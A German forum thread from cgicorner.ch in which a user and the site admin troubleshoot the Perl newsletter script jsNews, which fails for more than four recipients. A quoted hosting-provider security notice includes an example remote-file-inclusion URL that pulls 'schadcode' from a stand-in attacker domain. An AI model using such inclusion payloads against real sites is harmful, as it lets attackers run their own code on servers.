cgicorner.ch

Informationen rund um Perl/CGI

Sie sind hier: Home > Forum
Yet Another Bulletin Board

Willkommen, Gast. Bitte Einloggen oder Registrieren.
23. Oktober 2021 um 15:15

Übersicht Übersicht Hilfe Hilfe Suche Suche Mitglieder Mitglieder Einloggen Einloggen Registrieren Registrieren
cgicorner.ch « Problem beim Newsletter-Versand »

cgicorner.ch
   Hilfe
   jsNews

Problem beim Newsletter-Versand
« Vorheriges Thema | Nächstes Thema »
Seiten: 1  Antworten Antworten Bei Antworten benachrichtigen Bei Antworten benachrichtigen Drucken Drucken
   Autor  Thema: Problem beim Newsletter-Versand  (Gelesen 2276 mal)
Armin
YaBB Newbie
*

I love YaBB 1G - SP1!

Problem beim Newsletter-Versand
« am: 02. Juni 2007 um 12:42 »
Zitieren Zitieren Bearbeiten Bearbeiten

Hallo Jürg,

habe da ein Problem mit dem Versand eines Newsletters.
Benutze jsnews-flat Ver. 2.01 Versandart (nur Text).

Der Versand eines Newsletters funktioniert einwandfrei solange nicht mehr wie 4 Adressen in der Datenbank aktiv sind. Bei 5 oder mehr aktiven Adressen erhalte ich nach dem Versand eines Newsletters folgende Meldung (Der Newsletter wurde erfolgreich an folgende Empfänger versendet) welche auch aufgelistet werden und auch richtig sind. Zum Schluß noch folgende Meldung (Es wurden insgesamt 9 Newsletter versendet) nur kommen sie bei keinen der Abonnenten mehr an, warum auch immer Huh
Veilleicht hast Du ja eine gute Idee um dieses Problem zu beheben.
Für Deine Antwort bedanke ich mich schon einmal im vorraus und verbleibe mit freundlichen Grüßen.

Armin
cgicorner.ch
YaBB Administrator

Board Admin

Homepage E-Mail

Re: Problem beim Newsletter-Versand
« Antworten #1 am: 02. Juni 2007 um 13:51 »

Hallo Armin

Besten Dank für dein Mail. Ich kann mit besagtes Problem nicht erklären: jsNews funktioniert eigentlich auch mit mehr als 5 Empfängern und ist von mir selber so im Einsatz.

Ich könnte mir höchstens vorstellen, dass dein Webhosting-Provider aus Spam-Schutz-Gründen den Versand blockiert, sobald innert kürzester Zeit sehr viele Mails versendet werden. Ich schlage deshalb vor, dass du in einem ersten Schritt einmal in der jsnews.cgi den Parameter:

$mailVersand="FALSE";

setzt. Dies führt dazu, dass die Mails nicht mehr versendet werden, sondern im Script-Verzeichnis pro Mail eine EML-Datei erstellt wird.

Versuche nach dieser Änderung nochmals einen Newsletter an mehr als 5 Personen zu erstellen: werden EML-Dateien erstellt und falls ja ausreichend. Kannst du die Mails mal anschauen (via FTP herunterladen und Doppelklick): sieht da auch alles richtig aus? Eine allenfalls vorhandene mail.eml kannst du ignorieren: diese enthält noch die Platzhalter und wird immer erstellt, der FALSE-Parameter erstellt nur die Mail-Dateien mit der ID im Dateinamen zusätzlich.

Melde dich hier doch wieder, wenn du den Mailversand in eine Datei getestet hast und teil mir das Testergebnis mit, somit können wir das Problem etwas genauer einschränken...

Gruss
Jürg

cgicorner.ch - Informationen rund um Perl/CGI
Jürg Sommer
Armin
YaBB Newbie
*

I love YaBB 1G - SP1!

« Antworten #2 am: 03. Juni 2007 um 14:06 »

Hallo Jürg,

möchte mich erst einmal bei Dir für die schnelle Antwort bedanken.
Habe die von Dir vorgeschlagene Änderung vorgenommen und nochmals 9 Newsletter versendet. Es wurden auch 9 EML-Dateien im Script-Verzeichnis erstellt die auch im Inhalt alle richtig sind. Ich glaube auch, das dieses Problem erst nach einer Änderung seitens des Provider besteht. Da ich ja seit längerer Zeit schon jsnews Ver. 1.xx im Einsatz gehabt habe, welches auch wunderbar funktioniert hat, bis ich eines Tages feststellen mußte, das es nicht mehr funktioniert. Nach Umstellung auf die Ver. 2.01 dachte ich dieses Problem zu lösen, welches aber nicht der Fall war. Was ich feststellen konnte war, nach einigen Versuchen, das der Versand eines Newsletters bis max 4 Abonnenten funktioniert. Werde mal auf der HP des Providers nachsehen welche Änderungen vorgenommen wurden und werde sie Dir einmal zukommen lassen. Bis dahin verbleibe ich mit freundlichen Grüßen

Armin
Armin
YaBB Newbie
*

I love YaBB 1G - SP1!

« Antworten #3 am: 06. Juni 2007 um 12:06 »

Hallo Jürg,

letzte Änderung seitens des Providers, nachdem der Newsletter nicht mehr funktionierte wie folgt.

2007-02-05 17:43:33:
Sicherheitshinweis: PHP Includes  

Das Nachladen von PHP Code aus externen Seiten per http und ftp wurde deaktiviert.  

Der Aufruf der URL  
http://meinedomain.de/index.php?page=http://meinedomain.de/inhalt.php funktioniert nicht, aber  
http://meinedomain.de/index.php?page=inhalt.php funktioniert.  

Diese Änderung wurde nötig, da sich leider Angreifer genau diese Lücke zu nutze machen können, um den Server und/oder Ihre Webseite zu schädigen.  
z.B. so:  
http://meinedomain.de/index.php?page=http://angreiferdomain.de/schadcode .php

Ob diese Änderung damit was zutun hat, weiß ich nicht genau.

Gruß Armin
cgicorner.ch
YaBB Administrator

Board Admin

Homepage E-Mail

« Antworten #4 am: 06. Juni 2007 um 17:17 »

Hallo Armin

Nein, das hat mit jsNews sicherlich nichts zu tun, da jsNews auf Perl und nicht auf PHP basiert.

Zeigt aber höchstens, dass dein Webhoster in Bezug aus Sicherheit Massnahmen ergriffen hat...

Gruss
Jürg

Jürg Sommer
Armin
YaBB Newbie
*

I love YaBB 1G - SP1!

« Antworten #5 am: 07. Juni 2007 um 16:53 »

Hallo Jürg,

da dieses Problem ja wohl beim Provider liegt und nicht gelöst werden kann, werde ich den Newsletter halt im 4er Pack versenden.
Möchte mich nochmals für deine Mühe und schnellen Antworten bei Dir recht herzlich bedanken und verbleibe mit freundlichen Grüßen

Armin
cgicorner.ch
YaBB Administrator

Board Admin

Homepage E-Mail

« Antworten #6 am: 07. Juni 2007 um 19:10 »

Hallo Armin

Du kannst versuchen, in jsNews unter "Systemeinstellungen ändern" die Einstellung "max. Newsletter bis Refresh" auf die 4 zu setzen. D.h. dass 4 Newsletter versendet werden und sich die Seite dann neu aufbaut (also eine neue Script-Instanz gestartet wird). Wenn nur 4 Mails pro Scriptaufruf möglich sind, kannst du dies umgehen, ich vermute aber, dass innerhalb eines Zeitraumes nur eine bestimmte Zahl von Mails erlaubt sind, dann nützt dir diese Einstellung nichts....

Gruss
Jürg

Jürg Sommer
Armin
YaBB Newbie
*

I love YaBB 1G - SP1!

« Antworten #7 am: 08. Juni 2007 um 09:03 »

Hallo Jürg,

hatte es mit dieser Einstellung auch schon einmal ausprobiert. Aber leider funktionierte es mit dieser Einstellung auch nicht.

Gruss
Armin
Seiten: 1  Antworten Antworten Bei Antworten benachrichtigen Bei Antworten benachrichtigen Drucken Drucken

« Vorheriges Thema | Nächstes Thema »

cgicorner.ch » Powered by YaBB 1 Gold - SP3!
YaBB © 2000-2004. All Rights Reserved.